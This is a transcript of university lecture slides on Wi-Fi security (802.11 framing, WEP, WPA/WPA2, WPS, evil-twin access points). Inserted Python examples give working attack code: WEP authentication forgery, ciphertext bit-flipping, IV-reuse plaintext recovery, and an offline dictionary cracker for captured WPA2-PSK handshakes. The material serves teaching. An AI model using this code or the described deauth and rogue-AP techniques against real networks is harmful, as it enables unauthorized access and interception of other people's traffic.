Transcript Slides
Computer security 2015 –Ýmir Vigfússon
Based on slides by Björn@Syndis, Roy Werber, Pascal Meunier@Purdue,
material from Computer Networking: A Top Down Approach Featuring the Internet,
Jim Kurose, Keith Ross, Addison-Wesley
[Figure: data rate vs. range of wireless link standards, from Kurose & Ross]
Data rate (Mbps), reading the chart from top to bottom:
200: 802.11n (indoor)
54: 802.11a,g (indoor); 802.11a,g point-to-point (mid-range outdoor)
5-11: 802.11b (indoor)
~4: 802.16 (WiMAX (4G?)) (mid- to long-range outdoor)
~1-4: enhanced 3G cellular (UMTS/WCDMA-HSPDA, CDMA2000-1xEVDO) (long-range outdoor)
~1: 802.15 (indoor)
.384: 3G (UMTS/WCDMA, CDMA2000)
.056: 2G (IS-95, CDMA, GSM)
Range bands on the x-axis: Indoor 10-30m; Outdoor 50-200m; Mid-range outdoor 200m – 4 Km; Long-range outdoor 5Km – 20 Km
How does wireless differ from wired settings?
Base stations relay traffic between wireless and wired networks
▪ Cell towers
▪ Access points
▪ ...
Infrastructure mode vs. ad-hoc
▪ Ad-hoc: no base stations
Basic service set (BSS), a.k.a. "cell"
▪ Set of wireless hosts
▪ In infrastructure mode, also the base station
▪ In ad-hoc mode, hosts relay for each other
Interesting research questions ...
[Figure: two cells, BSS 1 and BSS 2, each with its own AP, connected through a hub, switch or router to the network infrastructure and the Internet]
Genesis of a wireless/WiFi network
JOIN ME Beacon!!!
I have powerful signal!
I am called Secure! (SSID)
My MAC address is 00:de:ad:be:ef:00 (BSSID)
I encrypt ... or not
Genesis of a wireless/WiFi network
... and a WLAN is born
Afterward, may authenticate, run DHCP, etc.
2.4 GHz – 2.485 GHz divided into 11 channels (in the US; 13 in Europe), overlapping
Each is a band. How would you share bandwidth?
Share a band: Carrier Sense Multiple Access with Collision Avoidance (CSMA/CA)
Rather than dividing frequency or time slots among users (FDMA/TDMA), or using code division (CDMA, as 3G cellular does), 802.11 has every station listen before it sends and back off for a random time when the channel is busy
Unlike Ethernet's CSMA/CD, a radio cannot detect a collision while it transmits, hence avoidance instead of detection
Optional: RTS/CTS reservation on top of CSMA/CA
▪ Short Request-to-Send (RTS) messages ask to reserve the channel
▪ The receiver (the access point, for uplink traffic) answers "Clear-to-Send" (CTS); every station that hears the CTS defers for the duration it announces
[Figure: A and B both send RTS to the Access Point and the reservations collide; after the AP's CTS for A, A sends DATA (A) while B defers; time runs downward]
Suppose you‘re in charge of designing the first
wireless protocol for the masses, 802.11.
How would you make it backward compatible?
[Figure: protocol stack on two end hosts and the network in between]
Application – application protocol – Application
Transport – TCP protocol – Transport
Network (IP) – IP protocol – IP, network access – IP protocol – Network (IP)
Data Link – Link – Data Link
Strive to replace only the lowest layer: link layer
In regular networks, this is usually Ethernet
[Figure: Ethernet frame]
Link (Ethernet) Header | IP Header | TCP | data | Link (Ethernet) Trailer
i.e. ETH | IP | TCP | data | ETH trailer
Let‘s try to encapsulate it with the information
that we need
Who we are
What access point we‘re talking to
Encryption?
[Figure: 802.11 data frame format, field sizes in bytes]
frame control (2) | duration (2) | address 1 (6) | address 2 (6) | address 3 (6) | seq control (2) | address 4 (6) | payload (0 - 2312) | CRC (4)
Address 1: MAC address of wireless host or AP to receive this frame
Address 2: MAC address of wireless host or AP transmitting this frame [serves as Ethernet source address]
Address 3: MAC address of router interface to which AP is attached [serves as Ethernet destination address]
Address 4: MAC address of a wireless relay host, present only when both the To-AP and From-AP bits are set (the slides' source describes this as the ad hoc / relay case)
Sequence No.: needed for ARQ (ACK required) mode, to detect retransmitted duplicates
[Figure: host H1 sends through the AP to router R1 and on to the Internet]
802.3 (Ethernet) frame, AP → R1: dest. address = R1 MAC addr; source address = H1 MAC addr
802.11 (WiFi) frame, H1 → AP: address 1 = AP MAC addr (1st dest, the AP); address 2 = H1 MAC addr (source); address 3 = R1 MAC addr (2nd dest, on Ethernet)
Remaining fields: frame seq # (for reliable ARQ); duration of reserved transmission time (RTS/CTS)
[Figure: the 2-byte frame control field, sub-field sizes in bits]
Protocol version (2) | Type (2) | Subtype (4) | To AP (1) | From AP (1) | More frag (1) | Retry (1) | Power mgt (1) | More data (1) | WEP (1) | Rsvd (1)
Type and Subtype give the frame type (RTS, CTS, ACK, data, ...)
WEP bit: payload is encrypted; To AP / From AP: which direction the frame is travelling relative to the AP (decides how addresses 1-4 are read)
Rest of the frame as above: duration (2) | address 1 (6) | address 2 (6) | address 3 (6) | seq control (2) | address 4 (6) | payload (0 - 2312) | CRC (4)
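The frame layout above in working code, as an added example that is not part of the lecture slides: a parser for the fixed 802.11 MAC header (frame control bits, duration, addresses, sequence control) plus the address-role table behind the H1/AP/R1 example. The sample frame, its MAC addresses and the payload are constructed for this example.

```python
"""Added example (not from the lecture slides): parse the fixed 802.11 MAC
header described in the frame-format figures, and read the three (or four)
address fields according to the To-AP / From-AP bits.  The frame bytes at the
bottom are constructed for this example; all MAC addresses are made up."""
import struct

FRAME_TYPES = {0: "management", 1: "control", 2: "data", 3: "extension"}


def fmt_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_80211_header(frame: bytes) -> dict:
    """Return the header fields of a data/management frame as a dict.

    Layout (bytes): frame control 2 | duration 2 | address 1 6 | address 2 6 |
    address 3 6 | sequence control 2 | [address 4 6].  Multi-byte fields are
    little-endian on the air."""
    if len(frame) < 24:
        raise ValueError("truncated 802.11 header")
    fc, duration = struct.unpack_from("<HH", frame, 0)
    hdr = {
        # bits 0-1 version, 2-3 type, 4-7 subtype, then the eight 1-bit flags
        "version": fc & 0x3,
        "type": FRAME_TYPES[(fc >> 2) & 0x3],
        "subtype": (fc >> 4) & 0xF,
        "to_ap": bool(fc & 0x0100),      # "To DS" in the standard
        "from_ap": bool(fc & 0x0200),    # "From DS"
        "more_frag": bool(fc & 0x0400),
        "retry": bool(fc & 0x0800),
        "power_mgt": bool(fc & 0x1000),
        "more_data": bool(fc & 0x2000),
        "protected": bool(fc & 0x4000),  # the "WEP" bit: body is encrypted
        "order": bool(fc & 0x8000),      # the slide's "Rsvd" bit
        "duration": duration,
        "addr1": fmt_mac(frame[4:10]),
        "addr2": fmt_mac(frame[10:16]),
        "addr3": fmt_mac(frame[16:22]),
    }
    seq_ctl = struct.unpack_from("<H", frame, 22)[0]
    hdr["frag_num"] = seq_ctl & 0xF   # low 4 bits
    hdr["seq_num"] = seq_ctl >> 4     # high 12 bits, used for ARQ duplicate detection
    body_offset = 24
    if hdr["to_ap"] and hdr["from_ap"]:   # 4-address (relay / AP-to-AP) frame
        if len(frame) < 30:
            raise ValueError("truncated 4-address header")
        hdr["addr4"] = fmt_mac(frame[24:30])
        body_offset = 30
    hdr["body_offset"] = body_offset
    return hdr


def interpret_addresses(hdr: dict) -> dict:
    """Map address 1-3(4) to roles; this is the table behind the H1/AP/R1 example."""
    to_ap, from_ap = hdr["to_ap"], hdr["from_ap"]
    if to_ap and not from_ap:       # host -> AP: addr3 is the final (Ethernet) destination
        return {"BSSID": hdr["addr1"], "SA": hdr["addr2"], "DA": hdr["addr3"]}
    if from_ap and not to_ap:       # AP -> host: addr3 is the original (Ethernet) source
        return {"DA": hdr["addr1"], "BSSID": hdr["addr2"], "SA": hdr["addr3"]}
    if not to_ap and not from_ap:   # ad hoc / management: station to station
        return {"DA": hdr["addr1"], "SA": hdr["addr2"], "BSSID": hdr["addr3"]}
    return {"RA": hdr["addr1"], "TA": hdr["addr2"], "DA": hdr["addr3"], "SA": hdr["addr4"]}


# Constructed sample: a data frame from host H1 to the AP, destined for router R1.
# frame control 0x0108 = type data (bits 2-3 = 10b) with the To-AP bit set;
# duration 44; sequence control 0x0070 = sequence number 7, fragment 0.
SAMPLE_FRAME = (
    bytes.fromhex("0801" "2c00")
    + bytes.fromhex("00deadbeef00")   # address 1: AP (BSSID)
    + bytes.fromhex("021122334455")   # address 2: H1
    + bytes.fromhex("00aabbccddee")   # address 3: R1's interface
    + bytes.fromhex("7000")
    + b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"...IP packet..."   # LLC/SNAP + payload
)

if __name__ == "__main__":
    h = parse_80211_header(SAMPLE_FRAME)
    print(h["type"], f"to_ap={h['to_ap']} from_ap={h['from_ap']} seq={h['seq_num']}")
    print(interpret_addresses(h))
```

Run it and the sample decodes as a data frame heading to the AP with addresses (BSSID, SA, DA) = (AP, H1, R1), which is exactly the 802.11 half of the H1/AP/R1 example above.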
How would you attack this protocol?
We can hinder communication (Denial-of-Service)
We can hijack and modify connections
We can pretend to be whoever we want (spoofing)
...
Effectively no security measures are being taken
What can we do to enhance security?
Authentication:
How do we know a user is who they say they are?
▪ Username/Password? PIN? SmartCard? Two-factor?
▪ Usually a binary (yes/no) process
Authorization:
How do we establish what an authorized user should and
shouldn’t be able to do?
▪ Administrator? Customer? On a free trial?
▪ Groups/Roles/Privileges/Permissions
Access control:
How do we enforce that resources are only accessed by
authorized users?
▪ Implemented through logic, permissions, access lists, etc.
First, let's optionally authenticate users
Second, let's at least try to encrypt every packet
How do we do that?
Unless we want an open network, we're going to have to share a key
Later, we should have key management!
How would you implement this?
At the time WEP was defined (1997), US export restrictions limited key sizes, so RC4 with a 40-bit key was used ("64-bit WEP": 40-bit key + 24-bit IV)
Extensions later for "128-bit" WEP (104-bit key + 24-bit IV)
What about authentication with a shared key?
First idea:
Client sends authentication request with key
Access point responds with ACCEPT if key correct
(Problem: the key itself goes over the air)
Second idea:
Client sends num and hash(num | key)
Access point also computes hash, ACCEPTS if it likes the outcome
(Problem: anyone who captured one (num, hash) pair can replay it, "pass-the-hash" style)
Third idea:
Client sends intention to authenticate
Access point sends back a random number (nonce) x
Client computes hash(x | key), sends to access point
Access point sends ACCEPT if it matches the local hash(x | key)
This is the shape of WEP shared-key authentication
Called the 4-step challenge-response handshake
Avoids disclosing the (static) key
Prevents replaying an old response, since x changes every time
Caveat: WEP does not actually hash. The client returns the 128-byte challenge WEP-encrypted (challenge || ICV XORed with the RC4 keystream for IV || key). An eavesdropper who sees one challenge and its response learns challenge ⊕ response, i.e. 132 bytes of keystream for that IV, and can answer any later challenge with the same IV without ever knowing the key.
[Figure: a stream cipher. The key seeds a pseudo-random number generator; its output (the keystream) is XORed letter by letter with the plaintext to give the ciphertext. Same input key = same output stream.]
Ideally, want to encrypt our communications ("plaintext") with a long, long string ("key").
How would you store the key? Need it to be generated
Idea: Just use the WEP key as input to the PRNG
then XOR with plaintext
What’s the problem?
Idea: Use num | WEP key as input instead, share
num as part of packet
This is used in the original WEP!
num is called an “Initialization Vector” (IV)
Basic idea behind WEP encryption
RC4: Streaming cipher algorithm
Why Initialization Vector (IV)?
Prevents reuse of the same keystream for every packet (same key ⇒ same RC4 output otherwise)
Also need a checksum (ICV) to detect malicious bit flips
(WEP's ICV is a CRC-32, which is linear and cannot actually do this; see below)
802.11 Frame
Header
Payload
Payload
ICV
3
2
ICV computed – 32-bit CRC of payload
ICV = Integrity Check Value checksum
4 x 40
Key 1
Keynumber
Key 2
Key 3
Key 4
Key
40
ICV computed – 32-bit CRC of payload
One of four keys selected – 40-bits
IV = Initialization vector
IV
keynumber
24
8
ICV computed – 32-bit CRC of payload
One of four keys selected – 40-bits
IV selected – 24-bits, prepended to keynumber
64
IV
Key
Payload
ICV
RC4
Payload
ICV
ICV computed – 32-bit CRC of payload
One of four keys selected – 40-bits
IV selected – 24-bits, prepended to keynumber
IV+key used to encrypt payload+ICV
WEP Frame
Header
IV
keynumber
Payload
ICV
ICV computed – 32-bit CRC of payload
One of four keys selected – 40-bits
IV selected – 24-bits, prepended to keynumber
IV+key used to encrypt payload+ICV
IV+keynumber prepended to encrypted
payload+ICV
4 x 40
Key 1
Keynumber
Key 2
Key 3
Key 4
Keynumber is used to select key
Key
40
64
IV
Key
Payload
ICV
RC4
Payload
Keynumber is used to select key
IV+key used to decrypt payload+ICV
Done!
ICV
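The WEP pipeline just described, together with the shared-key authentication handshake from the challenge-response slides, as an added example (not from the lecture slides, and not a production WEP implementation): RC4 keystream, IV || keynumber header, CRC-32 ICV, and two consequences of that design that the slides point at: one observed authentication exchange leaks enough keystream to pass a later challenge, and the linear ICV lets an attacker flip payload bits and repair the checksum without the key. All keys, IVs, challenges and payloads are made-up test values; the 4-entry key table mirrors the "4 x 40" figure above.

```python
"""Added example (not from the lecture slides): a working model of WEP as the
slides describe it, plus two attacks that follow directly from the design.
All keys, IVs and messages below are made-up test values."""
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream (KSA + PRGA), `length` bytes, for key = IV || WEP key."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):                    # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload: bytes) -> bytes:
    """Integrity Check Value: CRC-32 of the payload, little-endian."""
    return struct.pack("<I", zlib.crc32(payload))


def wep_encrypt(keys, keynumber: int, iv: bytes, payload: bytes) -> bytes:
    """Body = IV(3) | key-ID byte | RC4(IV || keys[keynumber])(payload || ICV).
    The key number sits in the top 2 bits of the key-ID byte."""
    assert len(iv) == 3 and 0 <= keynumber < 4
    plaintext = payload + icv(payload)
    return iv + bytes([keynumber << 6]) + xor(plaintext, rc4(iv + keys[keynumber], len(plaintext)))


def wep_decrypt(keys, body: bytes):
    """Return (payload, icv_ok) for a body produced by wep_encrypt."""
    iv, keynumber, ct = body[:3], body[3] >> 6, body[4:]
    pt = xor(ct, rc4(iv + keys[keynumber], len(ct)))
    payload, tag = pt[:-4], pt[-4:]
    return payload, tag == icv(payload)


def shared_key_response(keys, keynumber: int, iv: bytes, challenge: bytes) -> bytes:
    """Legitimate client in shared-key authentication: returns the AP's challenge
    WEP-encrypted (challenge || ICV under RC4(IV || key)), not a hash of it."""
    return wep_encrypt(keys, keynumber, iv, challenge)


def forge_response(challenge_seen: bytes, response_seen: bytes, new_challenge: bytes) -> bytes:
    """Eavesdropper who saw one (challenge, response) pair recovers the keystream
    for that IV and reuses it on a new challenge of the same length.  WEP never
    rejects a reused IV, so the AP accepts this without the attacker knowing the key."""
    header, ct = response_seen[:4], response_seen[4:]
    keystream = xor(ct, challenge_seen + icv(challenge_seen))
    return header + xor(new_challenge + icv(new_challenge), keystream)


def flip_bits(body: bytes, delta: bytes) -> bytes:
    """XOR `delta` into the encrypted payload and fix the encrypted ICV without the
    key, using CRC linearity: crc(p ^ d) = crc(p) ^ crc(d) ^ crc(0...0)."""
    header, ct = body[:4], body[4:]
    n = len(ct) - 4
    delta = delta.ljust(n, b"\x00")
    icv_delta = struct.pack("<I", zlib.crc32(delta) ^ zlib.crc32(bytes(n)))
    return header + xor(ct, delta + icv_delta)


# Constructed test values: a 4-entry table of 40-bit keys, as in the slides.
KEY_TABLE = [bytes.fromhex(h) for h in ("0102030405", "0a0b0c0d0e", "1122334455", "aabbccddee")]


def demo() -> dict:
    iv = b"\x00\x00\x2a"
    body = wep_encrypt(KEY_TABLE, 1, iv, b"GET /admin HTTP/1.0")
    payload, ok = wep_decrypt(KEY_TABLE, body)
    # 1. authentication forgery from one observed exchange (same IV, new challenge)
    chal1, chal2 = bytes(range(128)), bytes(reversed(range(128)))
    forged = forge_response(chal1, shared_key_response(KEY_TABLE, 0, iv, chal1), chal2)
    # 2. bit flip: turn "/admin" into "/guest" in the ciphertext, ICV still valid
    delta = b"\x00" * 4 + xor(b"/admin", b"/guest")
    flipped, flipped_ok = wep_decrypt(KEY_TABLE, flip_bits(body, delta))
    return {"roundtrip": (payload, ok),
            "forged_auth_ok": wep_decrypt(KEY_TABLE, forged) == (chal2, True),
            "flipped": (flipped, flipped_ok)}


if __name__ == "__main__":
    print(demo())
```

Note what the bit-flip shows: the ICV catches random noise (a single flipped ciphertext bit fails the check) but not an attacker who knows the CRC is linear, which is why WPA replaced it with a keyed MIC.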
IV (Initialization vector) is 24 bits long
How many seeds for the random number generator?
Only 2^24 ≈ 16 million different RC4 keystreams per key
If an IV is ever reused, the XOR of the two ciphertexts equals the XOR of the two plaintexts: the keystream cancels out
C = ciphertext, P = plaintext, K = RC4 keystream for that IV and key:
$C_1 \oplus C_2 = (P_1 \oplus K) \oplus (P_2 \oplus K) = P_1 \oplus P_2$
If you guess (or know) one plaintext message, you obtain the other
How long until we expect a reused IV?
Remember class about DNS birthday attacks?
23 people in a room
How likely that two people share the same birthday?
For $m$ people and $n$ days, the probability is about $1 - e^{-m^2/(2n)}$
Roughly; the exact answer for $m = 23$, $n = 365$ is 50.7%!
Here, $n = 2^{24} \approx 16$M, so:
50% chance of collision after only 4,823 packets!
99% chance of collision after 12,430 packets
If network is operating at 11Mbps, takes 3 seconds
Start listening in on traffic and gradually collect a keystream for every one of the 16M IVs; with that dictionary every packet on the network can be decrypted without ever learning the key
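The birthday estimate above and the IV-reuse attack it leads to, as an added example that is not part of the lecture slides. The keystream here is a fixed stand-in (not RC4), because the attack depends only on two packets sharing a keystream; the two HTTP requests are constructed sample plaintexts, and the crib-dragging helper goes one step beyond the slide by showing how a partially guessed plaintext is located without knowing either message in full.

```python
"""Added example (not from the lecture slides): the birthday estimate for
24-bit IV collisions, and what an attacker does with two packets that share
an IV.  The keystream is a stand-in (not RC4) since the attack does not depend
on the cipher; the two HTTP requests are constructed sample data."""
import hashlib
import math


def collision_probability(m: int, n: int = 2 ** 24) -> float:
    """P(at least one repeated value) among m draws from n: the 1 - e^{-m^2/2n} approximation."""
    return 1.0 - math.exp(-(m * m) / (2.0 * n))


def packets_for_probability(p: float, n: int = 2 ** 24) -> int:
    """Invert the approximation: smallest m with collision probability >= p."""
    return math.ceil(math.sqrt(-2.0 * n * math.log(1.0 - p)))


def seconds_to_collect(m: int, bytes_per_packet: int = 1500, mbps: float = 11.0) -> float:
    """Time to observe m packets of a given size at a given link rate
    (an upper bound: small packets arrive faster)."""
    return m * bytes_per_packet * 8 / (mbps * 1e6)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def recover_other_plaintext(c1: bytes, c2: bytes, p1_guess: bytes) -> bytes:
    """Same IV => same keystream K: c1 ^ c2 = (p1 ^ K) ^ (p2 ^ K) = p1 ^ p2,
    so a known or guessed p1 yields p2 directly; no key needed."""
    return xor(xor(c1, c2), p1_guess)


def crib_drag(p1_xor_p2: bytes, crib: bytes):
    """Slide a guessed fragment (a "crib") along p1 ^ p2.  Offsets where the
    result is printable ASCII are candidate alignments and reveal the other
    message at that position."""
    hits = []
    for off in range(len(p1_xor_p2) - len(crib) + 1):
        cand = xor(p1_xor_p2[off:off + len(crib)], crib)
        if all(0x20 <= c < 0x7F for c in cand):
            hits.append((off, cand.decode("ascii")))
    return hits


# Constructed sample: two requests encrypted under the same IV (same keystream).
P1 = b"GET /index.html HTTP/1.0\r\n"
P2 = b"POST /login.php HTTP/1.0\r\n"
STAND_IN_KEYSTREAM = hashlib.sha256(b"stand-in keystream for one reused IV").digest()
C1 = xor(P1, STAND_IN_KEYSTREAM)
C2 = xor(P2, STAND_IN_KEYSTREAM)


if __name__ == "__main__":
    for p in (0.5, 0.99):
        m = packets_for_probability(p)
        print(f"{p:.0%} collision after {m} packets (~{seconds_to_collect(m):.1f} s at 11 Mbps)")
    print(recover_other_plaintext(C1, C2, P1))
    print(crib_drag(xor(C1, C2), b" HTTP/1.0"))
```

The numbers reproduce the slide (4,823 and 12,430 packets); in practice many WEP cards reset the IV to zero at power-on and count upwards, so collisions arrive sooner and more predictably than the birthday bound suggests.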
More worrying: the Fluhrer, Martin, Shamir (FMS) attack (2001)
Passive attack against RC4 as used in WEP that recovers the RC4 key one byte at a time from "weak" IVs! Implemented in aircrack-ng
Can inject data into the network (e.g. replay captured ARP requests) to generate traffic and speed up the attack
Online demo of a WEP crack using airsnort
https://www.youtube.com/watch?v=_G4kOaJqMOE
Remember: Do NOT use any hacking software
without express permission from the owner of the
network you are attacking.
It was quickly realized that WEP offered lax security.
WEP was deprecated in 2004 (with the 802.11i amendment)
The Wi-Fi Alliance set up two solutions under the name Wi-Fi Protected Access (WPA)
Backward compatible: WPA-TKIP
Stopgap solution for WEP that could be flashed as firmware on to existing infrastructure (still RC4 underneath)
(i) Uses a per-packet key mixing function between IV and key (with a 48-bit IV/sequence counter)
(ii) Adds a message integrity check (MIC, "Michael") instead of the CRC32 ICV (cryptographically insecure)
Attack (Beck & Tews, 2008): decrypt a short packet and inject up to 7 forged packets to a wireless client
Forward thinking: WPA2 (802.11i)
Implemented a more elaborate 4-way handshake and group key handshake
Supports TKIP, CCMP (AES), etc.
WPA2 Personal: Pre-shared key (passphrase) shared between all users
WPA2 Enterprise: Connect to a RADIUS server with per-user credentials
▪ Tedious to set up. Also means that if your WiFi credentials are compromised, your whole (directory) account will be too.
2011/2012: Flaw in WPS – the device configuration tool for routers that uses an 8-digit PIN for fast access.
▪ The PIN is verified in two halves, so brute force needs ~11,000 guesses instead of 10^8; obtains the shared key in about 7 hours, and on some routers even when WPS is "disabled" in the UI
Key sharing still vulnerable to handshake capture
WEP, WPA-TKIP, WPA2-PSK – PSK = Pre-Shared Key
Capture the 4-way handshake (deauth a client to force a new one), then guess passphrases offline: each guess costs a PBKDF2 derivation (4096 HMAC-SHA1 rounds) and a MIC comparison
Cracking depends on password strength and can take a long time
Rainbow tables accelerate the process (coWPAtty), but the SSID is the salt, so tables only exist for common SSIDs
http://www.renderlab.net/projects/WPA-tables/
Does take long(er) to crack than WEP
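The offline attack on a captured WPA/WPA2-PSK handshake, as an added example that is not part of the lecture slides: PMK from the passphrase and SSID (PBKDF2), PTK and KCK from the PMK, nonces and MACs (the 802.11i PRF), and the MIC check that lets each guess be verified. The "capture" is constructed here from a chosen passphrase; MAC addresses, nonces, the EAPOL bytes and the wordlist are made-up stand-ins for what a sniffer and a dictionary would supply.

```python
"""Added example (not from the lecture slides): why a captured WPA/WPA2-PSK
4-way handshake can be attacked offline, and why precomputed tables are
per-SSID.  Key derivation follows IEEE 802.11i (PBKDF2 for the PMK, PRF-512
for the PTK, HMAC-SHA1 MIC for the AES key descriptor).  The capture is
constructed from a chosen passphrase; MACs, nonces and EAPOL bytes are made up."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The SSID is the salt: one table per SSID, and 4096 HMACs per guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, the AP (AA) and station (SPA) MACs and both nonces.
    Its first 16 bytes are the KCK that authenticates handshake messages 2-4."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2/CCMP key descriptor: MIC = first 16 bytes of HMAC-SHA1 over the
    EAPOL-Key frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(capture: dict, ssid: str, wordlist):
    """Offline dictionary attack: derive PMK -> PTK -> KCK for each guess and
    compare the recomputed MIC of message 2 with the captured one."""
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, ssid)
        kck = ptk_from_pmk(pmk, capture["aa"], capture["spa"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol2"]), capture["mic2"]):
            return guess
    return None


def simulate_capture(passphrase: str, ssid: str) -> dict:
    """Stand-in for a sniffer: what the attacker sees of messages 1 and 2."""
    aa = bytes.fromhex("00deadbeef00")                  # AP MAC (made up)
    spa = bytes.fromhex("021122334455")                 # station MAC (made up)
    anonce = hashlib.sha256(b"anonce").digest()          # fixed stand-ins for random nonces
    snonce = hashlib.sha256(b"snonce").digest()
    # Constructed EAPOL-Key message 2 with the MIC field zeroed (a real frame
    # carries descriptor type, key info, replay counter, SNonce, zeroed MIC, key data)
    eapol2 = b"EAPOL-Key msg2 (stand-in) " + snonce + bytes(16)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return {"aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol2": eapol2, "mic2": eapol_mic(kck, eapol2)}


if __name__ == "__main__":
    cap = simulate_capture("correct horse", "SuperSecure")
    print(crack_handshake(cap, "SuperSecure", ["password", "12345678", "correct horse"]))
```

Two things to notice when running it: the same passphrase under a different SSID fails (the table must be rebuilt per SSID, which is what limits the coWPAtty tables to popular names), and the per-guess cost is dominated by the 4096 PBKDF2 iterations, so the time to crack scales with the size of the dictionary the passphrase sits in.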
WPA2 Enterprise / WPA-802.1X
Mostly used in corporate or larger WiFi environments
A RADIUS server acts as the authentication server
Uses EAP, the "Extensible Authentication Protocol", which handles the actual authentication
Very few setups use EAP-TLS (client certificates)
▪ Considered the most secure variant of EAP
Most setups use EAP-PEAP (username/password inside a TLS tunnel) or something less secure
[Figure: evil-twin attack on WPA2-Enterprise. The client sends Probe Requests; the rogue AP answers with a Probe Response (SSID: SuperSecure, ENC: WPA2-Enterprise); a Deauth attack knocks the client off the real AP; the client then runs the 4-way handshake / authentication with the rogue AP and hands over its user name and password (MSCHAPv2 challenge/response)]
Many devices send authentication information without doing any verification of the server certificate.
Some people even set up their devices this way.
Several phone manufacturers
Even Linux distributions
Need to be in range of the device to capture the MSCHAPv2 exchange (which can then be cracked offline)
The default setting for most devices is, however, to ask the user to accept the changed certificate
Built on
The evil access point/hotspot idea
The fact most devices connect to multiple networks
The idea
We know NICs continually scan and send probe requests for networks they remember
What if we answer probe requests (or beacon) for a million SSIDs?
If a device has connected to one of them before, will I get an association?
Widespread risk
Applies to those that use traditional Wi-Fi networks
Also applies to singular devices and non-AP networks
Broadcast SSIDs (OPN, WEP, WPAPSK):
- Hot Spot
- Guests
- Free WiFi
- xfinitywifi
- ETC
- ....
[Figure: a client sends "Association request for SSID: gestir" ("gestir" is Icelandic for "guests") to the rogue AP]
Confidentiality:
Record authentication handshakes (WEP, WPA, WPA2)
Record and log traffic remotely (leaks)
Lure people to fake access points
Integrity:
Record packets, then replay, modify and inject them
Availability:
Easy to jam frequencies. Turn on the microwave oven...
Accountability:
Attacker can remain fully anonymous
Attacker can spoof and frame others